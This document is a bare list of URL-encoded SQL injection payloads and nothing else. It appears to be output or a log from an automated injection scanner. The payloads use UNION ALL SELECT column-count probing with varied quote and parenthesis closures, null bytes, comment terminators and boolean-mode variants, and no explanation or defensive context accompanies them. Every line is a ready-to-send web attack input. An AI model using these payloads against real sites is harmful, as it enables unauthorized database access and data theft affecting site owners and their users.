1%27%20%2B%20%28SELECT%20%27XLlL%27%20FROM%20DUAL%20WHERE%208060%3D8060%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27hiuF%27%20FROM%20DUAL%20WHERE%205702%3D5702%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27NTmT%27%20FROM%20DUAL%20WHERE%209619%3D9619%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27kVPe%27%20WHERE%208248%3D8248%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ydjD%27%20WHERE%204404%3D4404%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27bmVw%27%20WHERE%207287%3D7287%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27gynj%27%20WHERE%206916%3D6916%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27jbTl%27%20WHERE%204292%3D4292%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ucPM%27%20WHERE%203088%3D3088%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27GITV%27%20WHERE%206206%3D6206%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27YnjK%27%20WHERE%204063%3D4063%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27NIYm%27%20WHERE%201269%3D1269%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27QdzA%27%20WHERE%203482%3D3482%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 -4904%29%20UNION%20ALL%20SELECT%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%00 -4423%29%20UNION%20ALL%20SELECT%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%00 -4821%29%20UNION%20ALL%20SELECT%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%00 -3330%29%20UNION%20ALL%20SELECT%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%00 -9647%29%20UNION%20ALL%20SELECT%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%00 -6597%29%20UNION%20ALL%20SELECT%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%00 -8270%29%20UNION%20ALL%20SELECT%206903%2C%206903%2C%206903%2C%206903%2C%206903%2C%206903%2C%206903%2C%206903%2C%206903%2C%206903%2C%206903%2C%206903%2C%206903%2C%206903%2C%206903%2C%206903%2C%206903%00 -7886%29%20UNION%20ALL%20SELECT%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%00 -9987%29%20UNION%20ALL%20SELECT%204098%2C%204098%2C%204098%2C%204098%2C%204098%2C%204098%2C%204098%2C%204098%2C%204098%2C%204098%2C%204098%2C%204098%2C%204098%2C%204098%2C%204098%2C%204098%2C%204098%2C%204098%2C%204098%00 -1376%29%20UNION%20ALL%20SELECT%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%2C%201198%00 -5596%27%29%20UNION%20ALL%20SELECT%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%00 -8373%27%29%20UNION%20ALL%20SELECT%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%2C%209046%00 -4091%27%29%20UNION%20ALL%20SELECT%207425%2C%207425%2C%207425%2C%207425%2C%207425%2C%207425%2C%207425%2C%207425%2C%207425%2C%207425%2C%207425%2C%207425%2C%207425%00 -4808%27%29%20UNION%20ALL%20SELECT%206207%2C%206207%2C%206207%2C%206207%2C%206207%2C%206207%2C%206207%2C%206207%2C%206207%2C%206207%2C%206207%2C%206207%2C%206207%2C%206207%00 -3136%27%29%20UNION%20ALL%20SELECT%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%00 -5383%27%29%20UNION%20ALL%20SELECT%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%2C%204034%00 -3343%27%29%20UNION%20ALL%20SELECT%201410%2C%201410%2C%201410%2C%201410%2C%201410%2C%201410%2C%201410%2C%201410%2C%201410%2C%201410%2C%201410%2C%201410%2C%201410%2C%201410%2C%201410%2C%201410%2C%201410%00 -6852%27%29%20UNION%20ALL%20SELECT%208218%2C%208218%2C%208218%2C%208218%2C%208218%2C%208218%2C%208218%2C%208218%2C%208218%2C%208218%2C%208218%2C%208218%2C%208218%2C%208218%2C%208218%2C%208218%2C%208218%2C%208218%00 -9882%27%29%20UNION%20ALL%20SELECT%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%00 -1769%27%29%20UNION%20ALL%20SELECT%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%00 -8907%27%20UNION%20ALL%20SELECT%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%00 -1874%27%20UNION%20ALL%20SELECT%206562%2C%206562%2C%206562%2C%206562%2C%206562%2C%206562%2C%206562%2C%206562%2C%206562%2C%206562%2C%206562%2C%206562%00 -6713%27%20UNION%20ALL%20SELECT%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%00 -4838%27%20UNION%20ALL%20SELECT%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%00 -9690%27%20UNION%20ALL%20SELECT%202411%2C%202411%2C%202411%2C%202411%2C%202411%2C%202411%2C%202411%2C%202411%2C%202411%2C%202411%2C%202411%2C%202411%2C%202411%2C%202411%2C%202411%00 -4589%27%20UNION%20ALL%20SELECT%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%00 -6007%27%20UNION%20ALL%20SELECT%205765%2C%205765%2C%205765%2C%205765%2C%205765%2C%205765%2C%205765%2C%205765%2C%205765%2C%205765%2C%205765%2C%205765%2C%205765%2C%205765%2C%205765%2C%205765%2C%205765%00 -2225%27%20UNION%20ALL%20SELECT%203493%2C%203493%2C%203493%2C%203493%2C%203493%2C%203493%2C%203493%2C%203493%2C%203493%2C%203493%2C%203493%2C%203493%2C%203493%2C%203493%2C%203493%2C%203493%2C%203493%2C%203493%00 -8066%27%20UNION%20ALL%20SELECT%203682%2C%203682%2C%203682%2C%203682%2C%203682%2C%203682%2C%203682%2C%203682%2C%203682%2C%203682%2C%203682%2C%203682%2C%203682%2C%203682%2C%203682%2C%203682%2C%203682%2C%203682%2C%203682%00 -3701%27%20UNION%20ALL%20SELECT%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%00 -5325%22%20UNION%20ALL%20SELECT%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%00 -4571%22%20UNION%20ALL%20SELECT%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%00 -1984%22%20UNION%20ALL%20SELECT%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%2C%201095%00 -9339%22%20UNION%20ALL%20SELECT%206141%2C%206141%2C%206141%2C%206141%2C%206141%2C%206141%2C%206141%2C%206141%2C%206141%2C%206141%2C%206141%2C%206141%2C%206141%2C%206141%00 -7949%22%20UNION%20ALL%20SELECT%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%00 -7613%22%20UNION%20ALL%20SELECT%207513%2C%207513%2C%207513%2C%207513%2C%207513%2C%207513%2C%207513%2C%207513%2C%207513%2C%207513%2C%207513%2C%207513%2C%207513%2C%207513%2C%207513%2C%207513%00 -3316%22%20UNION%20ALL%20SELECT%209589%2C%209589%2C%209589%2C%209589%2C%209589%2C%209589%2C%209589%2C%209589%2C%209589%2C%209589%2C%209589%2C%209589%2C%209589%2C%209589%2C%209589%2C%209589%2C%209589%00 -5143%22%20UNION%20ALL%20SELECT%201482%2C%201482%2C%201482%2C%201482%2C%201482%2C%201482%2C%201482%2C%201482%2C%201482%2C%201482%2C%201482%2C%201482%2C%201482%2C%201482%2C%201482%2C%201482%2C%201482%2C%201482%00 -8472%22%20UNION%20ALL%20SELECT%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%2C%208686%00 -4967%22%20UNION%20ALL%20SELECT%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%00 -6835%29%20UNION%20ALL%20SELECT%204260%2C%204260%2C%204260%2C%204260%2C%204260%2C%204260%2C%204260%2C%204260%2C%204260%2C%204260%2C%204260%00%20AND%20%281330%3D1330 -5051%29%20UNION%20ALL%20SELECT%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%2C%202297%00%20AND%20%286377%3D6377 -1828%29%20UNION%20ALL%20SELECT%207810%2C%207810%2C%207810%2C%207810%2C%207810%2C%207810%2C%207810%2C%207810%2C%207810%2C%207810%2C%207810%2C%207810%2C%207810%00%20AND%20%284347%3D4347 -4722%29%20UNION%20ALL%20SELECT%209248%2C%209248%2C%209248%2C%209248%2C%209248%2C%209248%2C%209248%2C%209248%2C%209248%2C%209248%2C%209248%2C%209248%2C%209248%2C%209248%00%20AND%20%289097%3D9097 -1776%29%20UNION%20ALL%20SELECT%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%2C%206409%00%20AND%20%288013%3D8013 -5510%29%20UNION%20ALL%20SELECT%204492%2C%204492%2C%204492%2C%204492%2C%204492%2C%204492%2C%204492%2C%204492%2C%204492%2C%204492%2C%204492%2C%204492%2C%204492%2C%204492%2C%204492%2C%204492%00%20AND%20%281535%3D1535 -2740%29%20UNION%20ALL%20SELECT%202989%2C%202989%2C%202989%2C%202989%2C%202989%2C%202989%2C%202989%2C%202989%2C%202989%2C%202989%2C%202989%2C%202989%2C%202989%2C%202989%2C%202989%2C%202989%2C%202989%00%20AND%20%281414%3D1414 -1957%29%20UNION%20ALL%20SELECT%203716%2C%203716%2C%203716%2C%203716%2C%203716%2C%203716%2C%203716%2C%203716%2C%203716%2C%203716%2C%203716%2C%203716%2C%203716%2C%203716%2C%203716%2C%203716%2C%203716%2C%203716%00%20AND%20%285633%3D5633 -7027%29%20UNION%20ALL%20SELECT%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%2C%207400%00%20AND%20%287588%3D7588 -4582%29%20UNION%20ALL%20SELECT%208338%2C%208338%2C%208338%2C%208338%2C%208338%2C%208338%2C%208338%2C%208338%2C%208338%2C%208338%2C%208338%2C%208338%2C%208338%2C%208338%2C%208338%2C%208338%2C%208338%2C%208338%2C%208338%2C%208338%00%20AND%20%287017%3D7017 -9982%29%29%20UNION%20ALL%20SELECT%202232%2C%202232%2C%202232%2C%202232%2C%202232%2C%202232%2C%202232%2C%202232%2C%202232%2C%202232%2C%202232%00%20AND%20%28%285056%3D5056 -7676%29%29%20UNION%20ALL%20SELECT%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%2C%207293%00%20AND%20%28%289420%3D9420 -3731%29%29%20UNION%20ALL%20SELECT%201898%2C%201898%2C%201898%2C%201898%2C%201898%2C%201898%2C%201898%2C%201898%2C%201898%2C%201898%2C%201898%2C%201898%2C%201898%00%20AND%20%28%287117%3D7117 -5623%29%29%20UNION%20ALL%20SELECT%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%00%20AND%20%28%285674%3D5674 -1367%29%29%20UNION%20ALL%20SELECT%203973%2C%203973%2C%203973%2C%203973%2C%203973%2C%203973%2C%203973%2C%203973%2C%203973%2C%203973%2C%203973%2C%203973%2C%203973%2C%203973%2C%203973%00%20AND%20%28%289878%3D9878 -9035%29%29%20UNION%20ALL%20SELECT%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%2C%206916%00%20AND%20%28%285651%3D5651 -1275%29%29%20UNION%20ALL%20SELECT%207344%2C%207344%2C%207344%2C%207344%2C%207344%2C%207344%2C%207344%2C%207344%2C%207344%2C%207344%2C%207344%2C%207344%2C%207344%2C%207344%2C%207344%2C%207344%2C%207344%00%20AND%20%28%286298%3D6298 -9680%29%29%20UNION%20ALL%20SELECT%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%2C%205393%00%20AND%20%28%286712%3D6712 -9564%29%29%20UNION%20ALL%20SELECT%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%2C%208200%00%20AND%20%28%289718%3D9718 -3180%29%29%20UNION%20ALL%20SELECT%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%00%20AND%20%28%287109%3D7109 -6246%29%29%29%20UNION%20ALL%20SELECT%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%2C%208128%00%20AND%20%28%28%285892%3D5892 -3624%29%29%29%20UNION%20ALL%20SELECT%203330%2C%203330%2C%203330%2C%203330%2C%203330%2C%203330%2C%203330%2C%203330%2C%203330%2C%203330%2C%203330%2C%203330%00%20AND%20%28%28%288382%3D8382 -1322%29%29%29%20UNION%20ALL%20SELECT%204036%2C%204036%2C%204036%2C%204036%2C%204036%2C%204036%2C%204036%2C%204036%2C%204036%2C%204036%2C%204036%2C%204036%2C%204036%00%20AND%20%28%28%282860%3D2860 -1482%29%29%29%20UNION%20ALL%20SELECT%207790%2C%207790%2C%207790%2C%207790%2C%207790%2C%207790%2C%207790%2C%207790%2C%207790%2C%207790%2C%207790%2C%207790%2C%207790%2C%207790%00%20AND%20%28%28%289084%3D9084 -5601%29%29%29%20UNION%20ALL%20SELECT%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%00%20AND%20%28%28%283206%3D3206 -8546%29%29%29%20UNION%20ALL%20SELECT%207534%2C%207534%2C%207534%2C%207534%2C%207534%2C%207534%2C%207534%2C%207534%2C%207534%2C%207534%2C%207534%2C%207534%2C%207534%2C%207534%2C%207534%2C%207534%00%20AND%20%28%28%284469%3D4469 -8388%29%29%29%20UNION%20ALL%20SELECT%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%00%20AND%20%28%28%281706%3D1706 -9265%29%29%29%20UNION%20ALL%20SELECT%204285%2C%204285%2C%204285%2C%204285%2C%204285%2C%204285%2C%204285%2C%204285%2C%204285%2C%204285%2C%204285%2C%204285%2C%204285%2C%204285%2C%204285%2C%204285%2C%204285%2C%204285%00%20AND%20%28%28%281986%3D1986 -2806%29%29%29%20UNION%20ALL%20SELECT%209656%2C%209656%2C%209656%2C%209656%2C%209656%2C%209656%2C%209656%2C%209656%2C%209656%2C%209656%2C%209656%2C%209656%2C%209656%2C%209656%2C%209656%2C%209656%2C%209656%2C%209656%2C%209656%00%20AND%20%28%28%288274%3D8274 -1380%29%29%29%20UNION%20ALL%20SELECT%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%00%20AND%20%28%28%281040%3D1040 -1889%20UNION%20ALL%20SELECT%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%2C%208899%00 -1173%20UNION%20ALL%20SELECT%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%2C%203415%00 -2239%20UNION%20ALL%20SELECT%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%00 -1357%20UNION%20ALL%20SELECT%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%00 -2345%20UNION%20ALL%20SELECT%205053%2C%205053%2C%205053%2C%205053%2C%205053%2C%205053%2C%205053%2C%205053%2C%205053%2C%205053%2C%205053%2C%205053%2C%205053%2C%205053%2C%205053%00 -6110%20UNION%20ALL%20SELECT%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%2C%205562%00 -7613%20UNION%20ALL%20SELECT%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%00 -1857%20UNION%20ALL%20SELECT%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%00 -5082%20UNION%20ALL%20SELECT%204224%2C%204224%2C%204224%2C%204224%2C%204224%2C%204224%2C%204224%2C%204224%2C%204224%2C%204224%2C%204224%2C%204224%2C%204224%2C%204224%2C%204224%2C%204224%2C%204224%2C%204224%2C%204224%00 -9330%20UNION%20ALL%20SELECT%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%00 -9578%27%29%20UNION%20ALL%20SELECT%204558%2C%204558%2C%204558%2C%204558%2C%204558%2C%204558%2C%204558%2C%204558%2C%204558%2C%204558%2C%204558%00%20AND%20%28%27jjUp%27%3D%27jjUp -1104%27%29%20UNION%20ALL%20SELECT%208515%2C%208515%2C%208515%2C%208515%2C%208515%2C%208515%2C%208515%2C%208515%2C%208515%2C%208515%2C%208515%2C%208515%00%20AND%20%28%27ZGAB%27%3D%27ZGAB -5369%27%29%20UNION%20ALL%20SELECT%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%00%20AND%20%28%27QlNS%27%3D%27QlNS -2076%27%29%20UNION%20ALL%20SELECT%209512%2C%209512%2C%209512%2C%209512%2C%209512%2C%209512%2C%209512%2C%209512%2C%209512%2C%209512%2C%209512%2C%209512%2C%209512%2C%209512%00%20AND%20%28%27TEJj%27%3D%27TEJj -8873%27%29%20UNION%20ALL%20SELECT%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%00%20AND%20%28%27qAbc%27%3D%27qAbc -8965%27%29%20UNION%20ALL%20SELECT%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%2C%203612%00%20AND%20%28%27gIuQ%27%3D%27gIuQ -7164%27%29%20UNION%20ALL%20SELECT%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%2C%201975%00%20AND%20%28%27EmlD%27%3D%27EmlD 